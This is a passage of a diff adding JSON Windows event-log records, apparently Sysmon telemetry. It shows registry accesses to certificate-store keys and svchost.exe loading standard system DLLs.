"{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "svchost.exe", + "image_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "qmgr.dll", + "image_path": "C:\\Windows\\System32\\qmgr.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 